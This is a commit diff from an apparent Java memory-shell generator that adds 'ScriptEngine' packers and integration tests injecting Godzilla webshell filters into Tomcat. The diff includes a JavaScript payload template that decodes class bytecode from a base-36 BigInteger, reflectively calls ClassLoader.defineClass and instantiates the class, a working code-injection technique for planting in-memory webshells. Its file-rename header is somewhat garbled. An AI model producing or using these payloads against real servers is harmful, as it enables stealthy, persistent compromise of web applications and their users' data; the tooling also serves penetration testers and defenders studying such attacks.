feat: support ScriptEngineBigInteger

Author: wanswu

generator/src/main/java/com/reajason/javaweb/memshell/injector/tomcat/TomcatListenerInjector.java

@@ -201,4 +201,4 @@ public static Object invokeMethod(Object obj, String methodName, Class<?>[] para
             throw new RuntimeException("Error invoking method: " + methodName, e);
         }
     }
-}
+}

integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertion.java

@@ -328,7 +328,7 @@ public static void injectIsOk(String url, String shellType, ShellTool shellTool,
                 VulTool.uploadJspFileToServer(uploadEntry, filename, content);
                 VulTool.urlIsOk(shellUrl);
             }
-            case ScriptEngine -> VulTool.postIsOk(url + "/js", content);
+            case ScriptEngine, DefaultScriptEngine, ScriptEngineBigInteger -> VulTool.postIsOk(url + "/js", content);
             case EL -> VulTool.postIsOk(url + "/el", content);
             case SpEL, SpELSpringIOUtils, SpELScriptEngine, SpELSpringIOUtilsJDK17 ->
                     VulTool.postIsOk(url + "/spel", content);

integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/Tomcat8ExpressionContainerTest.java

@@ -53,6 +53,8 @@ static Stream<Arguments> casesProvider() {
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Aviator),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.BeanShell),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.ScriptEngine),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.DefaultScriptEngine),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.ScriptEngineBigInteger),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Groovy),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Rhino),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.JinJava),

packer/src/main/java/com/reajason/javaweb/packer/BigIntegerPacker.java

@@ -4,10 +4,14 @@
 
 import java.math.BigInteger;
 
+/**
+ * @author Wans
+ * @since 2025/08/26
+ */
 public class BigIntegerPacker implements Packer {
     @Override
     @SneakyThrows
     public String pack(ClassPackerConfig config) {
-        return new BigInteger(config.getClassBytes()).toString(36);
+        return new BigInteger(config.getClassBytes()).toString( Character.MAX_RADIX);
     }
 }

packer/src/main/java/com/reajason/javaweb/packer/Packers.java

@@ -34,6 +34,8 @@
 import com.reajason.javaweb.packer.ognl.OGNLScriptEnginePacker;
 import com.reajason.javaweb.packer.ognl.OGNLSpringIOUtilsGzipPacker;
 import com.reajason.javaweb.packer.rhino.RhinoPacker;
+import com.reajason.javaweb.packer.scriptengine.DefaultScriptEnginePacker;
+import com.reajason.javaweb.packer.scriptengine.ScriptEngineBigIntegerPacker;
 import com.reajason.javaweb.packer.scriptengine.ScriptEnginePacker;
 import com.reajason.javaweb.packer.spel.SpELPacker;
 import com.reajason.javaweb.packer.spel.SpELScriptEnginePacker;
@@ -87,6 +89,8 @@ public enum Packers {
      * 脚本引擎打包器
      */
     ScriptEngine(new ScriptEnginePacker()),
+    DefaultScriptEngine(new DefaultScriptEnginePacker(), ScriptEnginePacker.class),
+    ScriptEngineBigInteger(new ScriptEngineBigIntegerPacker(), ScriptEnginePacker.class),
     Rhino(new RhinoPacker()),
 
     /**

packer/src/main/java/com/reajason/javaweb/packer/scriptengine/DefaultScriptEnginePacker.java

@@ -0,0 +1,33 @@
+package com.reajason.javaweb.packer.scriptengine;
+
+import com.reajason.javaweb.packer.ClassPackerConfig;
+import com.reajason.javaweb.packer.Packer;
+import lombok.SneakyThrows;
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.nio.charset.Charset;
+import java.util.Objects;
+
+public class DefaultScriptEnginePacker implements Packer {
+    String jsTemplate = null;
+
+    public DefaultScriptEnginePacker() {
+        try {
+            jsTemplate = IOUtils.toString(Objects.requireNonNull(this.getClass().getResourceAsStream("/DefaultScriptEngine.js")), Charset.defaultCharset());
+        } catch (IOException ignored) {
+
+        }
+    }
+
+    @Override
+    @SneakyThrows
+    public String pack(ClassPackerConfig config) {
+        return jsTemplate
+                .replace("{{className}}", config.getClassName())
+                .replace("{{base64Str}}", config.getClassBytesBase64Str())
+                .replace("\n", "")
+                .replaceAll("(?m)^[ \t]+|[ \t]+$", "")
+                .replaceAll("[ \t]{2,}", " ");
+    }
+}

packer/src/main/java/com/reajason/javaweb/packer/scriptengine/ScriptEngineBigIntegerPacker.java

@@ -0,0 +1,34 @@
+package com.reajason.javaweb.packer.scriptengine;
+
+import com.reajason.javaweb.packer.ClassPackerConfig;
+import com.reajason.javaweb.packer.Packer;
+import com.reajason.javaweb.packer.Packers;
+import lombok.SneakyThrows;
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.nio.charset.Charset;
+import java.util.Objects;
+
+public class ScriptEngineBigIntegerPacker implements Packer {
+    String jsTemplate = null;
+
+    public ScriptEngineBigIntegerPacker() {
+        try {
+            jsTemplate = IOUtils.toString(Objects.requireNonNull(this.getClass().getResourceAsStream("/ScriptEngineBigInteger.js")), Charset.defaultCharset());
+        } catch (IOException ignored) {
+
+        }
+    }
+
+    @Override
+    @SneakyThrows
+    public String pack(ClassPackerConfig config) {
+        return jsTemplate
+                .replace("{{className}}", config.getClassName())
+                .replace("{{bigIntegerStr}}", Packers.BigInteger.getInstance().pack(config))
+                .replace("\n", "")
+                .replaceAll("(?m)^[ \t]+|[ \t]+$", "")
+                .replaceAll("[ \t]{2,}", " ");
+    }
+}

packer/src/main/java/com/reajason/javaweb/packer/scriptengine/ScriptEnginePacker.java

@@ -1,5 +1,6 @@
 package com.reajason.javaweb.packer.scriptengine;
 
+import com.reajason.javaweb.packer.AggregatePacker;
 import com.reajason.javaweb.packer.ClassPackerConfig;
 import com.reajason.javaweb.packer.Packer;
 import lombok.SneakyThrows;
@@ -13,25 +14,5 @@
  * @author ReaJason
  * @since 2024/12/3
  */
-public class ScriptEnginePacker implements Packer {
-    String jsTemplate = null;
-
-    public ScriptEnginePacker() {
-        try {
-            jsTemplate = IOUtils.toString(Objects.requireNonNull(this.getClass().getResourceAsStream("/shell.js")), Charset.defaultCharset());
-        } catch (IOException ignored) {
-
-        }
-    }
-
-    @Override
-    @SneakyThrows
-    public String pack(ClassPackerConfig config) {
-        return jsTemplate
-                .replace("{{className}}", config.getClassName())
-                .replace("{{base64Str}}", config.getClassBytesBase64Str())
-                .replace("\n", "")
-                .replaceAll("(?m)^[ \t]+|[ \t]+$", "")
-                .replaceAll("[ \t]{2,}", " ");
-    }
+public class ScriptEnginePacker implements AggregatePacker {
 }

packer/src/main/resources/shell.js …rc/main/resources/DefaultScriptEngine.jspacker/src/main/resources/shell.js renamed to packer/src/main/resources/DefaultScriptEngine.js packer/src/main/resources/shell.js renamed to packer/src/main/resources/DefaultScriptEngine.js

@@ -0,0 +1,10 @@
+var className = "{{className}}";
+var bigIntegerStr = "{{bigIntegerStr}}";
+var bytecode = new java.math.BigInteger(bigIntegerStr, 36).toByteArray();
+var clsString = java.lang.Class.forName("java.lang.String");
+var clsByteArray = (new java.lang.String("a").getBytes().getClass());
+var clsInt = java.lang.Integer.TYPE;
+var defineClass = java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", [clsString, clsByteArray, clsInt, clsInt]);
+defineClass.setAccessible(true);
+var clazz = defineClass.invoke(java.lang.Thread.currentThread().getContextClassLoader(), className, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
+clazz.newInstance();